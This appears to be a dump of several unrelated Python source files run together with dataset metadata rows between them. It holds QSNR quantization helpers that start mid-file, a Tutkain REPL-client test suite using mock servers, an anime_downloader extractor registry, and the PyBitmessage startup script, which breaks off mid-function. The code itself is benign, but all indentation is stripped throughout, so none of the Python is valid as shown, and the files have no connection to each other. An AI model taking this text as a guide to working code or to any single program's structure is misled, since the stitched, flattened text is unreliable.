def qsnr(orig, quant, axis=None):
"""Calculate the QSNR between two tensors
"""
qerr = orig - quant
if axis is not None:
axis = tuple(i for i in range(len(qerr.shape)) if i != axis)
asum_err = np.sum(qerr * qerr, axis=axis)
asum_orig = np.sum(orig * orig, axis=axis)
res = []
if axis is not None:
for sum_err, sum_orig in zip(asum_err, asum_orig):
if sum_err > 0:
if sum_orig < sum_err:
if sum_orig == 0:
res.append(-math.inf)
else:
# Means error is larger than signal
res.append(-int(round(10 * math.log10(sum_err/sum_orig), 0)))
else:
# Error portion of signal
res.append(int(round(10 * math.log10(sum_orig/sum_err), 0)))
else:
# Means no error
res.append(math.inf)
return np.array(res)
else:
if asum_err > 0:
if asum_orig < asum_err:
if asum_orig == 0:
return -math.inf
else:
# Means error is larger than signal
return -int(round(10 * math.log10(asum_err/asum_orig), 0))
# Error portion of signal
return int(round(10 * math.log10(asum_orig/asum_err), 0))
# Means no error
return math.inf
def cos_similarity(x, y):
x = x.copy().flatten()
y = y.copy().flatten()
if np.sum(np.abs(x)) == 0 or np.sum(np.abs(y)) == 0:
x = np.add(x, 1e-5)
y = np.add(y, 1e-5)
return 1 - dis.cosine(x, y)
def calculate_qsnr(npa, bit_size, frac_bits):
"""Calculate the QSNR when a tensor is quantized
"""
qnpa = np.floor((npa * 2.0 ** frac_bits) + 0.5)
max_value = 2**(bit_size - 1) - 1
min_value = -max_value - 1
qnpa = np.clip(qnpa, min_value, max_value)
qnpa = (qnpa / 2.0 ** frac_bits)
return qsnr(npa, qnpa)
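# Illustrative usage (hypothetical data): measure the QSNR, in dB, of a float
# tensor quantized to 16-bit words with 14 fractional bits.
#   x = np.linspace(-1.0, 1.0, 1000)
#   snr_db = calculate_qsnr(x, bit_size=16, frac_bits=14)  # larger is better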
def calculate_qsnrs(npa, ideal_ibits, force_ideal=False):
"""Walk away from the ideal whole-bit representation to see if
there is something better around it.
"""
store = {}
def get_qsnr(npa, bit_size, frac_bits):
""" Don't recalculate values we already have
"""
nonlocal store
if frac_bits < 0 or frac_bits >= bit_size:
return -math.inf
if frac_bits not in store:
store[frac_bits] = calculate_qsnr(npa, bit_size, frac_bits)
return store[frac_bits]
qstats = {}
# Already quantized
if not np.issubdtype(npa.dtype, np.floating):
return qstats
for bit_size in STATS_BITS:
frac_bits = min(max(bit_size - ideal_ibits, 0), bit_size - 1)
if force_ideal:
get_qsnr(npa, bit_size, frac_bits)
else:
while True:
t_low = get_qsnr(npa, bit_size, frac_bits - 1)
t_mid = get_qsnr(npa, bit_size, frac_bits)
t_high = -100 if frac_bits + 1 >= bit_size\
else get_qsnr(npa, bit_size, frac_bits + 1)
if t_low > t_mid:
frac_bits -= 1
elif t_high > t_mid:
frac_bits += 1
else:
break
qstats[bit_size] = {'q': frac_bits, 'qsnr': store[frac_bits]}
store.clear()
return qstats
def closest_greater(v):
for i in STATS_BITS:
if v <= i:
return i
return STATS_BITS[-1]
# def get_quantization(stats, min_qsnr, force_width):
# qstats = stats['qstats']
# if force_width is not None:
# return QType(bits=force_width, q=qstats[force_width]['q'], signed=True)
# for width in STATS_BITS:
# if qstats[width]['qsnr'] > min_qsnr:
# return QType(bits=width, q=qstats[width]['q'], signed=True)
# raise ValueError("no solution for this QSNR could be found")
def get_current_qsnr(stats, width):
return stats['qstats'][width]['qsnr']
| 35.384615 | 112 | 0.590665 |
4a27f493a0d095f1a2d3ca1d16f2d2abd31ae7a1 | 17,544 | py | Python | tests/test_package.py | pedrorgirardi/Tutkain | 3cbb6c8999279ea5da2bb2f656a45ac3693b7f0e | [
"Apache-2.0"
] | null | null | null | tests/test_package.py | pedrorgirardi/Tutkain | 3cbb6c8999279ea5da2bb2f656a45ac3693b7f0e | [
"Apache-2.0"
] | null | null | null | tests/test_package.py | pedrorgirardi/Tutkain | 3cbb6c8999279ea5da2bb2f656a45ac3693b7f0e | [
"Apache-2.0"
] | null | null | null | import queue
from Tutkain.api import edn
from Tutkain.package import source_root, start_logging, stop_logging
from Tutkain.src.repl import views
from Tutkain.src.repl.client import BabashkaClient, JVMClient, JSClient
from Tutkain.src import base64
from Tutkain.src import state
from .mock import Server
from .util import ViewTestCase
class TestJVMClient(ViewTestCase):
@classmethod
def conduct_handshake(self):
server = self.server
# Client starts clojure.main/repl
server.recv()
# Client switches into the bootstrap namespace
server.recv()
server.send("nil\n")
# Client defines load-base64 function
server.recv()
server.send("#'tutkain.bootstrap/load-base64\n")
# Client loads modules
server.recv()
server.send("#'tutkain.format/pp-str")
server.recv()
server.send("#'tutkain.backchannel/open")
server.recv()
server.send("#'tutkain.repl/repl")
server.recv()
with Server() as backchannel:
server.send({
edn.Keyword("tag"): edn.Keyword("ret"),
edn.Keyword("val"): f"""{{:host "localhost", :port {backchannel.port}}}""",
})
for _ in range(5):
backchannel.recv()
server.send({
edn.Keyword("tag"): edn.Keyword("out"),
edn.Keyword("val"): "Clojure 1.11.0-alpha1"
})
server.send({
edn.Keyword("tag"): edn.Keyword("ret"),
edn.Keyword("val"): "nil",
edn.Keyword("ns"): "user",
edn.Keyword("ms"): 0,
edn.Keyword("form"): """(println "Clojure" (clojure-version))"""
})
server.recv()
# Clojure version info is printed on the client
self.client.printq.get(timeout=5)
return backchannel
@classmethod
def setUpClass(self):
super().setUpClass()
start_logging(False)
def write_greeting(buf):
buf.write("user=> ")
buf.flush()
self.server = Server(greeting=write_greeting).start()
self.client = JVMClient(source_root(), self.server.host, self.server.port)
self.server.executor.submit(self.client.connect)
dialect = edn.Keyword("clj")
state.set_view_client(self.view, dialect, self.client)
repl_view = self.view.window().new_file()
views.configure(repl_view, dialect, self.client)
state.set_view_client(repl_view, dialect, self.client)
state.set_repl_view(repl_view, dialect)
self.backchannel = self.conduct_handshake()
@classmethod
def tearDownClass(self):
super().tearDownClass()
stop_logging()
if self.server:
self.server.stop()
if self.client:
self.client.halt()
def get_print(self):
return self.client.printq.get(timeout=5)
def print_item(self, ns, code):
return {
"printable": f"""{ns}=> {code}\n""",
"response": {
edn.Keyword("in"): f"""{code}"""
}
}
def eval_context(self, ns="user", file="NO_SOURCE_FILE", line=1, column=1):
actual = edn.read(self.backchannel.recv())
id = actual.get(edn.Keyword("id"))
response = edn.kwmap({
"id": id,
"op": edn.Keyword("set-eval-context"),
"file": file,
"line": line,
"column": column,
})
self.assertEquals(response, actual)
self.backchannel.send(edn.kwmap({
"id": id,
"file": file,
"ns": edn.Symbol(ns)
}))
def test_outermost(self):
self.set_view_content("(comment (inc 1) (inc 2))")
self.set_selections((9, 9), (17, 17))
self.view.run_command("tutkain_evaluate", {"scope": "outermost"})
self.eval_context(column=10)
self.eval_context(column=18)
self.assertEquals("(inc 1)\n", self.server.recv())
self.assertEquals("(inc 2)\n", self.server.recv())
def test_outermost_empty(self):
self.set_view_content("")
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "outermost"})
self.assertRaises(queue.Empty, lambda: self.server.recvq.get_nowait())
def test_innermost(self):
self.set_view_content("(map inc (range 10))")
self.set_selections((9, 9))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.eval_context(column=10)
self.assertEquals("(range 10)\n", self.server.recv())
self.assertEquals(self.print_item("user", "(range 10)"), self.get_print())
def test_form(self):
self.set_view_content("42 84")
self.set_selections((0, 0), (3, 3))
self.view.run_command("tutkain_evaluate", {"scope": "form"})
self.eval_context()
self.assertEquals(self.print_item("user", "42"), self.get_print())
self.eval_context(column=4)
self.assertEquals(self.print_item("user", "84"), self.get_print())
self.assertEquals("42\n", self.server.recv())
self.assertEquals("84\n", self.server.recv())
def test_parameterized(self):
self.set_view_content("{:a 1} {:b 2}")
self.set_selections((0, 0), (7, 7))
self.view.run_command("tutkain_evaluate", {"code": "((requiring-resolve 'clojure.data/diff) $0 $1)"})
self.eval_context()
self.assertEquals("((requiring-resolve 'clojure.data/diff) {:a 1} {:b 2})\n", self.server.recv())
def test_eval_in_ns(self):
self.view.run_command("tutkain_evaluate", {"code": "(reset)", "ns": "user"})
self.eval_context()
self.assertEquals(self.print_item("user", "(reset)"), self.get_print())
        # Client sends ns first
ret = self.server.recv()
self.assertTrue(ret.startswith("(do (or (some->> "))
self.assertEquals("(reset)\n", self.server.recv())
def test_ns(self):
self.set_view_content("(ns foo.bar) (ns baz.quux) (defn x [y] y)")
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "ns"})
self.eval_context(ns="baz.quux")
self.assertEquals(self.print_item("user", "(ns foo.bar)"), self.get_print())
self.assertEquals("(ns foo.bar)\n", self.server.recv())
self.eval_context(ns="baz.quux", column=14)
self.assertEquals(self.print_item("user", "(ns baz.quux)"), self.get_print())
self.assertEquals("(ns baz.quux)\n", self.server.recv())
def test_view(self):
self.set_view_content("(ns foo.bar) (defn x [y] y)")
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "view"})
response = edn.read(self.backchannel.recv())
self.assertEquals({
edn.Keyword("op"): edn.Keyword("load"),
edn.Keyword("code"): base64.encode("(ns foo.bar) (defn x [y] y)".encode("utf-8")),
edn.Keyword("file"): None,
edn.Keyword("id"): response.get(edn.Keyword("id"))
}, response)
def test_view_common(self):
self.view.assign_syntax("Packages/Tutkain/Clojure Common (Tutkain).sublime-syntax")
self.set_view_content("(ns foo.bar) (defn x [y] y)")
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "view"})
response = edn.read(self.backchannel.recv())
self.assertEquals({
edn.Keyword("op"): edn.Keyword("load"),
edn.Keyword("code"): base64.encode("(ns foo.bar) (defn x [y] y)".encode("utf-8")),
edn.Keyword("file"): None,
edn.Keyword("id"): response.get(edn.Keyword("id"))
}, response)
def test_discard(self):
self.set_view_content("#_(inc 1)")
self.set_selections((2, 2))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.eval_context(column=3)
self.assertEquals(self.print_item("user", "(inc 1)"), self.get_print())
self.assertEquals("(inc 1)\n", self.server.recv())
self.set_view_content("#_(inc 1)")
self.set_selections((2, 2))
self.view.run_command("tutkain_evaluate", {"scope": "outermost"})
self.eval_context(column=3)
self.assertEquals(self.print_item("user", "(inc 1)"), self.get_print())
self.assertEquals("(inc 1)\n", self.server.recv())
self.set_view_content("(inc #_(dec 2) 4)")
self.set_selections((14, 14))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.eval_context(column=8)
self.assertEquals(self.print_item("user", "(dec 2)"), self.get_print())
self.assertEquals("(dec 2)\n", self.server.recv())
self.set_view_content("#_:a")
self.set_selections((2, 2))
self.view.run_command("tutkain_evaluate", {"scope": "form"})
self.eval_context(column=3)
self.assertEquals(self.print_item("user", ":a"), self.get_print())
self.assertEquals(":a\n", self.server.recv())
def test_lookup(self):
self.set_view_content("(rand)")
for n in range(1, 5):
self.set_selections((n, n))
self.view.run_command("tutkain_show_information", {
"selector": "variable.function"
})
response = edn.read(self.backchannel.recv())
self.assertEquals({
edn.Keyword("op"): edn.Keyword("lookup"),
edn.Keyword("named"): "rand",
edn.Keyword("ns"): None,
edn.Keyword("dialect"): edn.Keyword("clj"),
edn.Keyword("id"): response.get(edn.Keyword("id"))
}, response)
def test_lookup_head(self):
self.set_view_content("(map inc )")
self.set_selections((9, 9))
self.view.run_command("tutkain_show_information", {
"selector": "variable.function",
"seek_backward": True
})
response = edn.read(self.backchannel.recv())
self.assertEquals({
edn.Keyword("op"): edn.Keyword("lookup"),
edn.Keyword("named"): "map",
edn.Keyword("ns"): None,
edn.Keyword("dialect"): edn.Keyword("clj"),
edn.Keyword("id"): response.get(edn.Keyword("id"))
}, response)
def test_issue_46(self):
code = """(apply str (repeat 9126 "x"))"""
self.set_view_content(code)
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.eval_context()
self.assertEquals(self.print_item("user", code), self.get_print())
retval = "x" * 9126
response = edn.kwmap({"tag": edn.Keyword("ret"), "val": retval})
self.assertEquals(code + "\n", self.server.recv())
self.server.send(response)
self.assertEqual({
"printable": retval,
"response": response
}, self.get_print())
def test_evaluate_dialect(self):
self.view.run_command("tutkain_evaluate", {"code": "(random-uuid)", "dialect": "cljs"})
# The server receives no message because the evaluation uses a
# different dialect than the server.
self.assertRaises(queue.Empty, lambda: self.server.recvq.get_nowait())
self.view.run_command("tutkain_evaluate", {"code": """(Integer/parseInt "42")""", "dialect": "clj"})
self.eval_context()
self.assertEquals("""(Integer/parseInt "42")\n""", self.server.recv())
self.get_print()
class TestJSClient(ViewTestCase):
@classmethod
def conduct_handshake(self):
server = self.server
# Client starts clojure.main/repl
server.recv()
# Client requests build IDs
server.recv()
# Server sends build ID list
server.send([
edn.Keyword("browser"),
edn.Keyword("node-script"),
edn.Keyword("npm")
])
# Client switches into the bootstrap namespace
server.recv()
server.send("nil\n")
# Client defines load-base64 function
server.recv()
server.send("#'tutkain.bootstrap/load-base64\n")
# Client loads modules
server.recv()
server.send("#'tutkain.format/pp-str")
server.recv()
server.send("#'tutkain.backchannel/open")
server.recv()
server.send("#'tutkain.repl/repl")
# Client starts REPL
server.recv()
with Server() as backchannel:
server.send({
edn.Keyword("host"): "localhost",
edn.Keyword("port"): backchannel.port
})
for _ in range(4):
backchannel.recv()
# Client sends version print
server.recv()
server.send({
edn.Keyword("tag"): edn.Keyword("out"),
edn.Keyword("val"): "ClojureScript 1.10.844"
})
server.send({
edn.Keyword("tag"): edn.Keyword("out"),
edn.Keyword("val"): "\\n"
})
server.send({
edn.Keyword("tag"): edn.Keyword("ret"),
edn.Keyword("val"): "nil",
edn.Keyword("ns"): "cljs.user",
edn.Keyword("ms"): 0,
edn.Keyword("form"): """(println "ClojureScript" *clojurescript-version*)"""
})
# TODO: Add test for no runtime
return backchannel
@classmethod
def setUpClass(self):
super().setUpClass(syntax="ClojureScript (Tutkain).sublime-syntax")
start_logging(False)
def write_greeting(buf):
buf.write("shadow-cljs - REPL - see (help)\n")
buf.flush()
buf.write("To quit, type: :repl/quit\n")
buf.flush()
buf.write("shadow.user=> ")
buf.flush()
self.server = Server(greeting=write_greeting)
self.server.start()
self.client = JSClient(
source_root(),
self.server.host,
self.server.port,
lambda _, on_done: on_done(1)
)
self.server.executor.submit(self.client.connect)
dialect = edn.Keyword("cljs")
state.set_view_client(self.view, dialect, self.client)
repl_view = self.view.window().new_file()
views.configure(repl_view, dialect, self.client)
state.set_view_client(repl_view, dialect, self.client)
state.set_repl_view(repl_view, dialect)
self.backchannel = self.conduct_handshake()
@classmethod
def tearDownClass(self):
super().tearDownClass()
stop_logging()
if self.server:
self.server.stop()
if self.client:
self.client.halt()
def test_innermost(self):
self.set_view_content("(map inc (range 10))")
self.set_selections((9, 9))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.assertEquals("(range 10)\n", self.server.recv())
class TestBabashkaClient(ViewTestCase):
@classmethod
def conduct_handshake(self):
server = self.server
# Client starts io-prepl
server.recv()
# Client sends version print
server.recv()
server.send({
edn.Keyword("tag"): edn.Keyword("out"),
edn.Keyword("val"): """Babashka 0.3.6""",
})
server.send({
edn.Keyword("tag"): edn.Keyword("ret"),
edn.Keyword("val"): "nil",
edn.Keyword("ns"): "user",
edn.Keyword("ms"): 0,
edn.Keyword("form"): """(println "Babashka" (System/getProperty "babashka.version"))""",
})
@classmethod
def setUpClass(self):
super().setUpClass(syntax="Babashka (Tutkain).sublime-syntax")
start_logging(False)
def write_greeting(buf):
buf.write("Babashka v0.3.6 REPL.\n")
buf.flush()
buf.write("Use :repl/quit or :repl/exit to quit the REPL.\n")
buf.flush()
buf.write("Clojure rocks, Bash reaches.\n")
buf.flush()
buf.write("\n")
buf.flush()
buf.write("user=> ")
buf.flush()
self.server = Server(greeting=write_greeting)
self.server.start()
self.client = BabashkaClient(
source_root(),
self.server.host,
self.server.port
)
self.server.executor.submit(self.client.connect)
dialect = edn.Keyword("bb")
state.set_view_client(self.view, dialect, self.client)
repl_view = self.view.window().new_file()
views.configure(repl_view, dialect, self.client)
state.set_view_client(repl_view, dialect, self.client)
state.set_repl_view(repl_view, dialect)
self.conduct_handshake()
# TODO: Extract into base class
@classmethod
def tearDownClass(self):
super().tearDownClass()
stop_logging()
if self.server:
self.server.stop()
if self.client:
self.client.halt()
def test_innermost(self):
self.set_view_content("(map inc (range 10))")
self.set_selections((9, 9))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.assertEquals("(range 10)\n", self.server.recv())
| 34.066019 | 109 | 0.570964 |
4a27f6086e40d5c3a7624d057288a4b8246d1325 | 2,019 | py | Python | anime_downloader/extractors/init.py | danielb2/anime-downloader | 0bebd6f9e8a7ea6264fcc6c4436570596f299213 | [
"Unlicense"
] | null | null | null | anime_downloader/extractors/init.py | danielb2/anime-downloader | 0bebd6f9e8a7ea6264fcc6c4436570596f299213 | [
"Unlicense"
] | null | null | null | anime_downloader/extractors/init.py | danielb2/anime-downloader | 0bebd6f9e8a7ea6264fcc6c4436570596f299213 | [
"Unlicense"
] | null | null | null | from importlib import import_module
ALL_EXTRACTORS = [
{
'sitename': 'rapidvideo',
'modulename': 'rapidvideo',
'regex': 'rapidvideo',
'class': 'RapidVideo'
},
{
'sitename': 'no_extractor',
'modulename': 'fake_extractor',
'regex': 'no_extractor',
'class': 'AnimeVideo',
},
{
'sitename': 'stream.moe',
'modulename': 'moe',
'regex': 'stream.moe',
'class': 'StreamMoe',
},
{
'sitename': 'streamango',
'modulename': 'streamango',
'regex': 'streamango',
'class': 'Streamango',
},
{
'sitename': 'mp4upload',
'modulename': 'mp4upload',
'regex': 'mp4upload',
'class': 'MP4Upload'
},
{
'sitename': 'kwik',
'modulename': 'kwik',
'regex': 'kwik',
'class': 'Kwik'
},
{
'sitename': 'trollvid',
'modulename': 'trollvid',
'regex': 'trollvid',
'class': 'Trollvid'
},
{
'sitename': 'mp4sh',
'modulename': 'mp4sh',
'regex': 'mp4sh',
'class': 'MP4Sh'
},
{
'sitename': 'yourupload',
'modulename': 'yourupload',
'regex': 'yourupload',
'class': 'Yourupload'
},
{
'sitename': 'vidstream',
'modulename': 'vidstream',
'regex': 'vidstream',
'class': 'VidStream'
},
{
'sitename': 'haloani',
'modulename': 'haloani',
'regex': 'haloani',
'class': 'Haloani'
},
{
'sitename': 'gcloud',
'modulename': 'gcloud',
'regex': 'gcloud',
'class': 'Gcloud'
},
]
def get_extractor(name):
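    """Return the extractor class whose regex matches the given link or site name."""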
for extractor in ALL_EXTRACTORS:
if extractor['regex'] in name.lower():
module = import_module(
'anime_downloader.extractors.{}'.format(
extractor['modulename'])
)
return getattr(module, extractor['class'])
| 23.206897 | 56 | 0.47053 |
4a27f967fd7493dfbdc90bd8055b1e598085138d | 18,038 | py | Python | src/bitmessagemain.py | kaue/PyBitmessage | 7b8bf082ff0d569f507d65e087000e4e3d6ccf3f | [
"MIT",
"BSD-2-Clause-FreeBSD"
] | null | null | null | src/bitmessagemain.py | kaue/PyBitmessage | 7b8bf082ff0d569f507d65e087000e4e3d6ccf3f | [
"MIT",
"BSD-2-Clause-FreeBSD"
] | null | null | null | src/bitmessagemain.py | kaue/PyBitmessage | 7b8bf082ff0d569f507d65e087000e4e3d6ccf3f | [
"MIT",
"BSD-2-Clause-FreeBSD"
] | null | null | null | #!/usr/bin/python2.7
"""
The PyBitmessage startup script
"""
# Copyright (c) 2012-2016 Jonathan Warren
# Copyright (c) 2012-2020 The Bitmessage developers
# Distributed under the MIT/X11 software license. See the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Right now, PyBitmessage only supports connecting to stream 1. It doesn't
# yet contain logic to expand into further streams.
import os
import sys
app_dir = os.path.dirname(os.path.abspath(__file__))
os.chdir(app_dir)
sys.path.insert(0, app_dir)
import depends
depends.check_dependencies()
import ctypes
import getopt
import multiprocessing
# Used to capture a Ctrl-C keypress so that Bitmessage can shut down gracefully.
import signal
import socket
import threading
import time
import traceback
from struct import pack
import defaults
import shared
import shutdown
import state
from bmconfigparser import BMConfigParser
from debug import logger # this should go before any threads
from helper_startup import (
adjustHalfOpenConnectionsLimit, start_proxyconfig)
from inventory import Inventory
# Network objects and threads
from network import (
BMConnectionPool, Dandelion, AddrThread, AnnounceThread, BMNetworkThread,
InvThread, ReceiveQueueThread, DownloadThread, UploadThread
)
from network.knownnodes import readKnownNodes
from singleinstance import singleinstance
# Synchronous threads
from threads import (
set_thread_name, printLock,
addressGenerator, objectProcessor, singleCleaner, singleWorker, sqlThread)
def _fixSocket():
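    """Patch platform-specific socket gaps: SO_BINDTODEVICE on Linux; inet_ntop/inet_pton wrappers and IPv6 sockopts on Windows."""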
if sys.platform.startswith('linux'):
socket.SO_BINDTODEVICE = 25
if not sys.platform.startswith('win'):
return
# Python 2 on Windows doesn't define a wrapper for
# socket.inet_ntop but we can make one ourselves using ctypes
if not hasattr(socket, 'inet_ntop'):
addressToString = ctypes.windll.ws2_32.WSAAddressToStringA
def inet_ntop(family, host):
"""Converting an IP address in packed
binary format to string format"""
if family == socket.AF_INET:
if len(host) != 4:
raise ValueError("invalid IPv4 host")
host = pack("hH4s8s", socket.AF_INET, 0, host, "\0" * 8)
elif family == socket.AF_INET6:
if len(host) != 16:
raise ValueError("invalid IPv6 host")
host = pack("hHL16sL", socket.AF_INET6, 0, 0, host, 0)
else:
raise ValueError("invalid address family")
buf = "\0" * 64
lengthBuf = pack("I", len(buf))
addressToString(host, len(host), None, buf, lengthBuf)
return buf[0:buf.index("\0")]
socket.inet_ntop = inet_ntop
# Same for inet_pton
if not hasattr(socket, 'inet_pton'):
stringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
def inet_pton(family, host):
"""Converting an IP address in string format
to a packed binary format"""
buf = "\0" * 28
lengthBuf = pack("I", len(buf))
if stringToAddress(str(host),
int(family),
None,
buf,
lengthBuf) != 0:
raise socket.error("illegal IP address passed to inet_pton")
if family == socket.AF_INET:
return buf[4:8]
elif family == socket.AF_INET6:
return buf[8:24]
else:
raise ValueError("invalid address family")
socket.inet_pton = inet_pton
    # These sockopts are needed for IPv6 support
if not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, 'IPV6_V6ONLY'):
socket.IPV6_V6ONLY = 27
def signal_handler(signum, frame):
"""Single handler for any signal sent to pybitmessage"""
process = multiprocessing.current_process()
thread = threading.current_thread()
logger.error(
'Got signal %i in %s/%s',
signum, process.name, thread.name
)
if process.name == "RegExParser":
# on Windows this isn't triggered, but it's fine,
# it has its own process termination thing
raise SystemExit
if "PoolWorker" in process.name:
raise SystemExit
if thread.name not in ("PyBitmessage", "MainThread"):
return
logger.error("Got signal %i", signum)
# there are possible non-UI variants to run bitmessage
# which should shutdown especially test-mode
if state.thisapp.daemon or not state.enableGUI:
shutdown.doCleanShutdown()
else:
print('# Thread: %s(%d)' % (thread.name, thread.ident))
for filename, lineno, name, line in traceback.extract_stack(frame):
print('File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
print(' %s' % line.strip())
print('Unfortunately you cannot use Ctrl+C when running the UI'
' because the UI captures the signal.')
class Main(object):
"""Main PyBitmessage class"""
def start(self):
"""Start main application"""
# pylint: disable=too-many-statements,too-many-branches,too-many-locals
_fixSocket()
adjustHalfOpenConnectionsLimit()
config = BMConfigParser()
daemon = config.safeGetBoolean('bitmessagesettings', 'daemon')
try:
opts, _ = getopt.getopt(
sys.argv[1:], "hcdt",
["help", "curses", "daemon", "test"])
except getopt.GetoptError:
self.usage()
sys.exit(2)
for opt, _ in opts:
if opt in ("-h", "--help"):
self.usage()
sys.exit()
elif opt in ("-d", "--daemon"):
daemon = True
elif opt in ("-c", "--curses"):
state.curses = True
elif opt in ("-t", "--test"):
state.testmode = True
if os.path.isfile(os.path.join(
state.appdata, 'unittest.lock')):
daemon = True
state.enableGUI = False # run without a UI
# Fallback: in case when no api command was issued
state.last_api_response = time.time()
# Apply special settings
config.set(
'bitmessagesettings', 'apienabled', 'true')
config.set(
'bitmessagesettings', 'apiusername', 'username')
config.set(
'bitmessagesettings', 'apipassword', 'password')
config.set(
'bitmessagesettings', 'apivariant', 'legacy')
config.set(
'bitmessagesettings', 'apinotifypath',
os.path.join(app_dir, 'tests', 'apinotify_handler.py')
)
if daemon:
state.enableGUI = False # run without a UI
if state.enableGUI and not state.curses and not depends.check_pyqt():
sys.exit(
'PyBitmessage requires PyQt unless you want'
' to run it as a daemon and interact with it'
' using the API. You can download PyQt from '
'http://www.riverbankcomputing.com/software/pyqt/download'
' or by searching Google for \'PyQt Download\'.'
' If you want to run in daemon mode, see '
'https://bitmessage.org/wiki/Daemon\n'
'You can also run PyBitmessage with'
' the new curses interface by providing'
' \'-c\' as a commandline argument.'
)
# is the application already running? If yes then exit.
state.thisapp = singleinstance("", daemon)
if daemon:
with printLock:
print('Running as a daemon. Send TERM signal to end.')
self.daemonize()
self.setSignalHandler()
set_thread_name("PyBitmessage")
state.dandelion = config.safeGetInt('network', 'dandelion')
# dandelion requires outbound connections, without them,
# stem objects will get stuck forever
if state.dandelion and not config.safeGetBoolean(
'bitmessagesettings', 'sendoutgoingconnections'):
state.dandelion = 0
if state.testmode or config.safeGetBoolean(
'bitmessagesettings', 'extralowdifficulty'):
defaults.networkDefaultProofOfWorkNonceTrialsPerByte = int(
defaults.networkDefaultProofOfWorkNonceTrialsPerByte / 100)
defaults.networkDefaultPayloadLengthExtraBytes = int(
defaults.networkDefaultPayloadLengthExtraBytes / 100)
readKnownNodes()
# Not needed if objproc is disabled
if state.enableObjProc:
# Start the address generation thread
addressGeneratorThread = addressGenerator()
# close the main program even if there are threads left
addressGeneratorThread.daemon = True
addressGeneratorThread.start()
# Start the thread that calculates POWs
singleWorkerThread = singleWorker()
# close the main program even if there are threads left
singleWorkerThread.daemon = True
singleWorkerThread.start()
# Start the SQL thread
sqlLookup = sqlThread()
# DON'T close the main program even if there are threads left.
# The closeEvent should command this thread to exit gracefully.
sqlLookup.daemon = False
sqlLookup.start()
Inventory() # init
# init, needs to be early because other thread may access it early
Dandelion()
# Enable object processor and SMTP only if objproc enabled
if state.enableObjProc:
# SMTP delivery thread
if daemon and config.safeGet(
'bitmessagesettings', 'smtpdeliver', '') != '':
from class_smtpDeliver import smtpDeliver
smtpDeliveryThread = smtpDeliver()
smtpDeliveryThread.start()
# SMTP daemon thread
if daemon and config.safeGetBoolean(
'bitmessagesettings', 'smtpd'):
from class_smtpServer import smtpServer
smtpServerThread = smtpServer()
smtpServerThread.start()
            # Start the object processor thread
objectProcessorThread = objectProcessor()
            # DON'T close the main program even if the thread remains.
# This thread checks the shutdown variable after processing
# each object.
objectProcessorThread.daemon = False
objectProcessorThread.start()
# Start the cleanerThread
singleCleanerThread = singleCleaner()
# close the main program even if there are threads left
singleCleanerThread.daemon = True
singleCleanerThread.start()
# Not needed if objproc disabled
if state.enableObjProc:
shared.reloadMyAddressHashes()
shared.reloadBroadcastSendersForWhichImWatching()
# API is also objproc dependent
if config.safeGetBoolean('bitmessagesettings', 'apienabled'):
import api # pylint: disable=relative-import
singleAPIThread = api.singleAPI()
# close the main program even if there are threads left
singleAPIThread.daemon = True
singleAPIThread.start()
# start network components if networking is enabled
if state.enableNetwork:
start_proxyconfig()
BMConnectionPool().connectToStream(1)
asyncoreThread = BMNetworkThread()
asyncoreThread.daemon = True
asyncoreThread.start()
for i in range(config.getint('threads', 'receive')):
receiveQueueThread = ReceiveQueueThread(i)
receiveQueueThread.daemon = True
receiveQueueThread.start()
announceThread = AnnounceThread()
announceThread.daemon = True
announceThread.start()
state.invThread = InvThread()
state.invThread.daemon = True
state.invThread.start()
state.addrThread = AddrThread()
state.addrThread.daemon = True
state.addrThread.start()
state.downloadThread = DownloadThread()
state.downloadThread.daemon = True
state.downloadThread.start()
state.uploadThread = UploadThread()
state.uploadThread.daemon = True
state.uploadThread.start()
if config.safeGetBoolean('bitmessagesettings', 'upnp'):
import upnp
upnpThread = upnp.uPnPThread()
upnpThread.start()
else:
# Populate with hardcoded value (same as connectToStream above)
state.streamsInWhichIAmParticipating.append(1)
if not daemon and state.enableGUI:
if state.curses:
if not depends.check_curses():
sys.exit()
print('Running with curses')
import bitmessagecurses
bitmessagecurses.runwrapper()
elif state.kivy:
config.remove_option('bitmessagesettings', 'dontconnect')
# from bitmessagekivy.mpybit import NavigateApp
# NavigateApp().run()
else:
import bitmessageqt
bitmessageqt.run()
else:
config.remove_option('bitmessagesettings', 'dontconnect')
if daemon:
while state.shutdown == 0:
time.sleep(1)
if (
state.testmode
and time.time() - state.last_api_response >= 30
):
self.stop()
elif not state.enableGUI:
state.enableGUI = True
try:
# pylint: disable=relative-import
from tests import core as test_core
except ImportError:
self.stop()
return
test_core_result = test_core.run()
self.stop()
test_core.cleanup()
sys.exit(
'Core tests failed!'
if test_core_result.errors or test_core_result.failures
else 0
)
@staticmethod
def daemonize():
"""Running as a daemon. Send signal in end."""
grandfatherPid = os.getpid()
parentPid = None
try:
if os.fork():
# unlock
state.thisapp.cleanup()
# wait until grandchild ready
while True:
time.sleep(1)
os._exit(0) # pylint: disable=protected-access
except AttributeError:
# fork not implemented
pass
else:
parentPid = os.getpid()
state.thisapp.lock() # relock
os.umask(0)
try:
os.setsid()
except AttributeError:
# setsid not implemented
pass
try:
if os.fork():
# unlock
state.thisapp.cleanup()
# wait until child ready
while True:
time.sleep(1)
os._exit(0) # pylint: disable=protected-access
except AttributeError:
# fork not implemented
pass
else:
state.thisapp.lock() # relock
state.thisapp.lockPid = None # indicate we're the final child
sys.stdout.flush()
sys.stderr.flush()
if not sys.platform.startswith('win'):
si = file(os.devnull, 'r')
so = file(os.devnull, 'a+')
se = file(os.devnull, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
